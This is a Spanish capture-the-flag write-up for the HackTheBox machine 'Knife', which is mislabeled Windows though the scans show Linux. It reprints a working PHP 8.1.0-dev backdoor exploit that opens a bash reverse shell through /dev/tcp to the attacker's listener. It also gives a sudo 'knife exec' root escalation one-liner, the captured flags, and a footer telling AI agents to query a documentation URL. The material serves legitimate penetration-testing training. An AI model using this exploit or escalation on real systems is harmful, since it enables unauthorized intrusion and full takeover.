# Knife

#### Sobre esta maquina: HTB

Sistema Operativo: Windows

**Skills Usados**: 

* PHP 8.1.0-DEV RCE
* Abusing Sudoers 

Metodologia:

Realizamos el primer escaneo de reconocimiento:

```
// 
❯ nmap -p- --open -sS -T4 -n -Pn 10.10.10.242 -oN First_Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:29 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.95% done; ETC: 19:30 (0:00:03 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```

Ahora hacemos un escaneo con Scripts y versiones en los puertos abiertos:

```
// 
❯ nmap -p80,22 -sVC -sS -T4 -n -Pn 10.10.10.242 -oN sVC_Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:32 EDT
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e

22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Revisamos que corre por el puerto 80:

<figure><img src="/files/Y3RZQY1FQnC3uSHmqWyV" alt=""><figcaption><p>Web corriendo por puerto 80.</p></figcaption></figure>

<figure><img src="/files/mdx1UqlrpPaHI79qiXMZ" alt=""><figcaption><p>PHP 8.1.0-dev.</p></figcaption></figure>

Vemos que es un servidor apache que usa codigo PHP 8.1.0-dev.

Enumeramos subdominos con Gobuster pero no conseguimos nada:

```
// 
❯ gobuster dir -u "http://10.10.10.242/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.10.10.242/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
```

Buscamos exploits para PHP 8.1.0-DEV Y conseguimos uno en particular, revisando el perfil de desarrollador, encontramos en su github un archivo python que permite obtener una revshell directamente asi que tambien lo descargamos:

```
// 
❯ searchsploit 8.1.0-dev

Exploit Title | Path

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
```

<figure><img src="/files/7EWPlZvt7qDtHbKXywoh" alt=""><figcaption><p>Repositorio que encontramos que explota la vulnerabilidad en php 8.1.0-dev que nos otorga una reverseshell.</p></figcaption></figure>

Movemos el exploit para ejectuarlo:

```
// 
❯ mv revshell_php_8.1.0-dev.py /home/guerrerove/HTB/machines/knife/exploit
```

En lo que consiste el exploit:

```
// 
Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
Date: 23 may 2021
Exploit Author: flast101
Vendor Homepage: https://www.php.net/
Software Link:
- https://hub.docker.com/r/phpdaily/php
- https://github.com/phpdaily/php
Version: 8.1.0-dev
Tested on: Ubuntu 20.04
CVE : N/A
References:
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
- https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
Usage:
python3 revshell_php_8.1.0-dev.py 
"""
#!/usr/bin/env python3
import os, sys, argparse, requests
request = requests.Session()
def check_target(args):
response = request.get(args.url)
for header in response.headers.items():
if "PHP/8.1.0-dev" in header[1]:
return True
return False
def reverse_shell(args):
payload = 'bash -c "bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1"'
injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)
def main():
parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp ")
parser.add_argument("url", metavar='', help="Target URL")
parser.add_argument("lhost", metavar='', help="Attacker listening IP",)
parser.add_argument("lport", metavar='', help="Attacker listening port")
args = parser.parse_args()
if check_target(args):
reverse_shell(args)
else:
print("Host is not available or vulnerable, aborting...")
exit
if name == "main":
main()
```

Ejecutamos el Script y nos ponemos en escucha:

```
// 
❯ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.51 443

❯ nc -nlvp 443

listening on [any] 443 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.242] 42898
bash: cannot set terminal process group (989): Inappropriate ioctl for device
bash: no job control in this shell

james@knife:/$
```

Obtuvimos la reverse Shell, estamos dentro, ahora conseguimos la primera flag:

```
// 
james@knife:/$ cd /home

james@knife:/home$ cd james

james@knife:~$ cat user.txt

bfdda457427a526151f71c62184a9321
```

Intentaremos escalar privilegios primero listando el id y los permisos como administrador:

```
// 
james@knife:~$ id

uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User james may run the following commands on knife:

(root) NOPASSWD: /usr/bin/knife
```

Vemos que pudemos ejecutar el comando /usr/bin/knife , Este binario es vulnerable a la injeccion de una consola interactiva a traves de one liner "sudo knife exec -E 'exec "/bin/sh"', asi que lo ejecutaremos:

```
// 
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'

whoami

root
```

Hemos ganado acceso, ahora ubicaremos la ultima flag:

```
// 
cd /root

ls

delete.sh root.txt snap

cat root.txt

ed84828a0b7baf1d3c7a901152f08c47
```

Conseguimos la ultima flag y damos por finalizada esta maquina.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://henrys-writeups.gitbook.io/owo/maquinas-vulneradas/hackthebox/knife.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.